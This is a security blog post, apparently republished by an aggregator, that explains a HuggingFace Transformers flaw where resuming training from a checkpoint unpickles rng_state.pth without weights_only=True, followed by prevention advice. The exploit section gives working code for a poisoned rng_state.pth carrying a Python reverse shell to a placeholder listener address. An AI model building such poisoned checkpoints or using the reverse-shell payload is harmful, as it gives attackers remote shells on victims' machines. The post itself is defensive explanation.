CVE-2026–1839: How Training AI with Heavy Weights Can Still Lead to Light Security

CVE-2026–1839: How Training AI with Heavy Weights Can Still Lead to Light Security
IntroductionHey, it’s been a while! After years of not publishing, I’ve decided to migrate my blog o 2026-5-22 14:11:57 Author: mikeczumak.com(查看原文) 阅读量:14 收藏

Introduction

Hey, it’s been a while! After years of not publishing, I’ve decided to migrate my blog over to Medium (because I wanted zero maintenance overhead) and begin writing again. I had lots of ideas for my first post on Medium but figured it would be silly of me not to write something about AI :)

Then of course, the next question was what to write about first in this ever growing topic? Security? Governance? Productivity? I took a quick scan of my news feed and a recent vulnerability in a HuggingFace library caught my eye. Although it certainly wasn’t anything earth shattering, I thought it would be an interesting illustration of several areas related to AI-related risk.

You may be saying, ugh yet another vulnerability. Just update the vulnerable code and move on. And to that I say yes, but…

I thought this CVE highlighted some of the complexities inherent in the evolving AI landscape that at least made for an interesting walkthrough.

Models are being trained, widely shared, and perhaps inherently trusted more than they should be. Data scientists and AI developers rely on libraries that sit on top of other libraries, abstracting away complexity (a good thing) but perhaps also abstracting away the visibility needed to understand the risks of using that code (not such a good thing).

Even with advancements like Safetensors, there is risk inherent in the code that practitioners rely on every day. Well-meaning users are experimenting at a blistering pace, which doesn’t always align with secure software management practices.

Is all of this really unique or somehow novel to AI? Not at all. But for those that are interested in thinking about potential risks in this space, it could serve as a good example.

With that, let’s dive in…

The Vulnerability

The vulnerability in question is CVE-2026–1839, which reads as follows:

A vulnerability in the HuggingFace Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution. The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions. An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded. The issue is resolved in version v5.0.0rc3.

Ok, so what exactly does this CVE mean? Let’s break it down.

A vulnerability in the HuggingFace Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution.

At its core, the HuggingFace Transformers library provides an API to download, train, and deploy pre-trained AI models, abstracting away the underlying complexities of PyTorch or TensorFlow and reducing the coding burden on developers.

The purpose of the Trainer class of the Transformers library is, well…training. The Trainer class does a lot of the heavy lifting for model training — forward and backward passes, calculating loss, updating model weights, hardware management and saving and reloading checkpoints for model training state tracking. (these “state tracking” checkpoints are central to this vulnerability as you’ll see next).

The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6 …

Since trainer.py is open source, we can see what this looks like:

def _load_rng_state(self, checkpoint):
    # ... previous logic to locate the file ...
    if checkpoint is not None:
        rng_state_file = os.path.join(checkpoint, "rng_state.pth")
        if os.path.isfile(rng_state_file):
            # VULNERABLE LINE (approx. 3059)
            checkpoint_rng_state = torch.load(rng_state_file)
            ...

This code block is called when a Checkpoint needs to be used to resume training. What it’s actually doing is calling the load function in PyTorch. Remember, I said earlier that you can think of Hugging Face Transformers (and its Trainer class) as an abstraction layer. It’s what the developer interacts with directly. However, “under the hood” and abstracted away from the developer is PyTorch, an open-source deep learning framework.

PyTorch has historically (prior to version 2.6) used the Pickle module by default to save and then restore model weights and states via calls to functions like torch.save() and torch.load().

If you’re not familiar, a pickle file is a tiny python-based program file that runs on a small virtual machine. When you use a pickle file you aren’t just reading values, you’re actually executing instructions on a mini virtual machine. Unfortunately in the world of Pickle, there is little by way of default validation meaning arbitrary operating system instructions can be included in pickle files…certainly not ideal from a security perspective. (Not to mention they can be very slow for large models).

To address the security issues of Pickle files (e.g. arbitrary code execution) the developers of PyTorch introduced the weights_only=True security flag to the torch.load() function. This security flag essentially forces PyTorch to use a restricted unpickler. Instead of allowing the file to run any command it wants, it limits the loader to only a specific “allowlist” of safe types (tensors, primitives, basic data containers). If the file tries to do anything else — like import the os module or run a system command — the process will immediately crash with a WeightsUnpickler error instead of executing the malicious code.

Sounds great right? Well, unfortunately such changes take time to enforce. From the time it was introduced back in 2022 through 2025 (with the release of PyTorch 2.6), weights_only=False was still the default value, hence the potential for this vulnerability.

An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded.

What is the rng_state.pth file? Well, training an AI model takes a long time and can be very resource intensive. If the training is stopped for any reason (server crash, power outage, etc.) you don’t want to have to start all over again. Considering the resource demands of training a model from scratch, it’s also not uncommon that a developer or researcher would want to download an already-trained model from a repository like Hugging Face and then perform some additional fine-tuning training with their own data.

In both of the above examples, there needs to be a way to track training progress and resume where you left off. To address this, developers use Checkpoints that can be used to restore training from a particular point. While training a model, progress is periodically saved as Checkpoints and, in doing so, several key pieces of data are stored to disk including model weights and biases, optimizer state, epoch & loss data and something called the random number generator (RNG) state which is saved in a file called rng_state.pth.

When resuming training, the Transformer Library Trainer Class leverages rng_state.pth to restore the state of the random number generator, which ensures that the resumed session is in an identical state as it was when it stopped.

The Exploit

For the purposes of demonstration, let’s assume a bad actor posts a malicious model to a site like Hugging Face under the guise of a legitimate pre-trained model that can be tuned with additional training. Unsuspecting victims would then download the model, resume training and trigger the exploit.

Per the CVE advisory, the exploit itself would live in the rng_state.pth file so the first thing that is needed is a “poisoned” rng_state.pth file. This can be simulated with some basic python:

import torch
import osclass MaliciousRNG:
    def __reduce__(self):
        # REPLACE [LISTENER_IP] with your actual Listener IP address
        # This is the "detonation" payload
        cmd = "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"[LISTENER_IP]\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'"
        return (os.system, (cmd,))
# Save as the innocent-looking RNG state file
torch.save(MaliciousRNG(), "rng_state.pth")
print("Poisoned 'rng_state.pth' created. Transfer this to the target model checkpoint folder.")

Creating the rng_state.pth file isn’t enough though because there are validation checks built into the Trainer class that will cause the exploit to fail if the attacker’s model does not behave like a legitimate model. For that to happen we have to perform a basic training run:

import torch
from datasets import Dataset
from transformers import Trainer, TrainingArguments, BertConfig, BertForSequenceClassification
import os# 1. creates a legitimate checkpoint
config = BertConfig(vocab_size=10, hidden_size=10, num_hidden_layers=1, num_attention_heads=1)
model = BertForSequenceClassification(config)
dataset = Dataset.from_dict({"input_ids": [[0]*10]*10, "labels": [0]*10})
args = TrainingArguments(output_dir="./poisoned_model", max_steps=2, save_steps=2, use_cpu=True)
trainer = Trainer(model=model, args=args, train_dataset=dataset)
trainer.train()

The above code forces Trainer to generate several files including: its own mathematically correct metadata (trainer_state.json), weights (pytorch_model.bin or model.safetensors), optimizer states and other files (config.json, optimizer.pt and scheduler.pt) that will pass the Trainer class validation steps, allowing for training of the malicious model to successfully resume and trigger the exploit.

However it’s important to note that these validation steps conducted by theTrainer class are simply functional “sanity checks” (math integrity), and not security checks. Once those functional requirements are met, the library trusts the underlying data (the rng_state.pth Pickle file) completely.

Next we replace the generated rng_state.pth with the “poisoned” file created earlier and start our listener to catch the shell embedded in that poisoned file.

Get Mike Czumak’s stories in your inbox

Join Medium for free to get updates from this writer.

Remember me for faster sign in

Here’s a simple visual of what that folder structure may look like:

checkpoint-2/
├── config.json
├── generation_config.json
├── model.safetensors
├── tokenizer.json
├── special_tokens_map.json
├── optimizer.pt
├── scheduler.pt
└── rng_state.pth <-- the poisoned file

Now we can simulate an unsuspecting victim resuming training of the poisoned model that they just downloaded:

from transformers import Trainer, TrainingArguments, AutoModelForSequenceClassification
import os# Points to the checkpoint directory of the poisoned model the victim just 'downloaded'
checkpoint_dir = "./poisoned_model/checkpoint-2"
print(f"[*] Auditing model checkpoint at {checkpoint_dir}...")
# Standard boilerplate for loading a model
model = AutoModelForSequenceClassification.from_pretrained("bert-base-uncased", num_labels=2)
args = TrainingArguments(output_dir="./results")
trainer = Trainer(model=model, args=args)
# THE DETONATION POINT
# The Trainer class automatically looks for 'rng_state.pth' in the checkpoint 
# directory to resume the random state. It uses insecure torch.load() internally.
print("[!] Resuming from checkpoint...")
trainer.train(resume_from_checkpoint=checkpoint_dir)
print("Evaluation complete.")

The above code represents a seemingly innocuous training resumption that unbeknownst to the victim, triggers the exploit hidden in the rng_state.pth file.

In this scenario, the victim isn’t directly targeted by the bad actor. They only see what they believe to be a high-quality model on a trusted repository like Hugging Face.

The Prevention

Per the advisory:

This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6… The issue is resolved in version v5.0.0rc3.

The version number here is important. Updating to versions that support, but don’t enforce weights_only=True is not enough. Recall earlier when I said PyTorch added the weights_only flag in earlier versions (way back in October 2022 with version 1.13) but didn’t enforce it until version 2.6? Well even though they didn’t start enforcing it until recently, starting in version 2.4 (in July 2024) they added a verbose warning. When attempting this vulnerability on some of those earlier versions the “victim” would likely see the following:

Warning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don’t have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.

While this is a good indicator that something is wrong, it actually doesn’t stop the vulnerability from executing, it just executes really loudly. And prior to those versions (e.g. v2.3.1), the exploit executes completely silently.

So first and foremost, updating to the latest version is the best prevention. Why? Hugging Face updated the internal calls to torch.load to enforce safer deserialization. Hugging Face has also added several other defensive layers including logic guards that protect against remote code, integrity guards that scans uploads for pickle files that may contain malicious code and prioritization of Safetensors, a non-executable alternative to Pickle.

Is Safetensors enough to protect against this?

Unfortunately no. Safetensors was specifically designed to be “non-executable” and will protect against malicious code during the initial load of a module. However, it’s still technically possible for code to execute when resuming from a checkpoint because while the Trainer class loads the weights (safely) via Safetensors it then separately looks for the RNG state leading right back to the pickle file. This is why updating to the latest version is necessary.

What about the Transformers library’s use of safe_globals?

Let’s take another look at the CVE advisory:

This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions.

In some versions of transformers prior to the fix, the developers tried to wrap the dangerous call in a safety feature called safe_globals(). This was intended to tell PyTorch: “Only allow these specific, safe ML classes to be loaded.”. Unfortunately, as the advisory states, in PyTorch versions below 2.6, this safe_globals() context manager essentially serves as a “no-op” (non-operational) piece of code and doesn’t provide any protection.

Is use of an outdated HuggingFace library the only way such an exploit can occur?

No. While this CVE called out the HuggingFace Transformers library and the way in which it interfaces with PyTorch, it’s certainly possible to use PyTorch directly.

import torchdata = torch.load("rng_state.pth")

Calling torch.load in this manner on older versions of PyTorch would result in execution since the default is still set to weights_only=False just like it would if the same function were called indirectly via Hugging Face Transformers.

Even on newer versions, this can still be overridden :

import torch# The researcher explicitly disables the weights_only control 
data = torch.load("rng_state.pth", weights_only=False)

You may ask, “Why would anyone do this?” The answer could be due to several reasons.

First, if a researcher is using advanced optimization frameworks (like DeepSpeed, Megatron-LM, or custom PyTorch Lightning implementations) the checkpoint doesn’t just save weights, it saves the entire environment state, serializing custom Python classes, complex Lambdas, or experimental data structures. Using weights_only=True treats any unrecognized custom class as a security threat and aborts. To resume training without losing weeks of progress, the researcher sets weights_only=False just to make the file load.

Second, a good portion of the open-source AI ecosystem still consists of repositories that haven’t been updated in years. If a researcher downloads a highly specialized model trained in 2022 using PyTorch 1.x, that checkpoint was baked using the full, unstructured Pickle module and attempting to load that legacy checkpoint in a modern environment with weights_only=True may throw an UnpicklingError because of how the internal objects were serialized years ago. Rather than trying to rewrite a third-party model's historical architecture, the researcher flips the flag to False to "just make it work."

Third, the pre-2.6 era of verbose warnings that I referenced earlier means that every time a developer ran torch.load(), PyTorch would flood the console with a multi-line FutureWarning screaming about malicious pickle data. For researchers running massive automated pipelines, these warnings clogged terminals and polluted log files. To silence the noise, developers may have gotten into the habit of explicitly adding weights_only=False to their code simply to tell PyTorch: "I know what I'm doing, stop spamming my terminal."

An even simpler (and perhaps worse) reason? Because the Docs tell you to. Take a look at the following screenshot from the official pytorch tutorial on saving and loading modules.

Press enter or click to view image in full size

The official PyTorch saving/loading documentation prioritizing brevity over security parameters.

It even calls it “the most intuitive syntax” involving “the least amount of code”.

Whatever the reason, human behavior is always a consideration with vulnerabilities like these and certainly in the broader approach to understanding and managing risk.

Future improvements

Efforts to rid these workflows of dependencies on pickle files have led to developments like Safetensors. And while Safetensors addressed part of the problem, there is clearly still work to do.

The community is actively pushing toward frameworks like Distributed Checkpointing (DCP) and transitioning secondary state trackers (like RNG states) to non-executable formats like structured JSON or Protobuf. Ultimately, the goal is a complete separation of concerns: storing raw computational tensors in a .safetensors file and environment metadata in a separate, non-executable .json file—permanently shutting down the Pickle Virtual Machine across the entire training lifecycle.

Until these formats become the default industry standard, the baseline for security remains operational discipline: continuously updating toolsets, remaining vigilant about what is being downloaded from public AI repositories, and auditing the code paths executing beneath pipeline abstractions.

Conclusion

So yes, at its simplest, this CVE is just another classic example of the age-old advice: “update your code!” But hopefully, this walkthrough has shed a little light on the non-trivial architectural issues that hide behind seemingly simple vulnerabilities. It represents a tiny sliver of the broader, moving target that is managing AI supply chain risk.

Until next time,

Mike

文章来源: https://mikeczumak.com/cve-2026-1839-how-training-ai-with-heavy-weights-can-still-lead-to-light-security-bf4e34c9799c?source=rss----b73b8ccc7897---4
如有侵权请联系:admin#unsafe.sh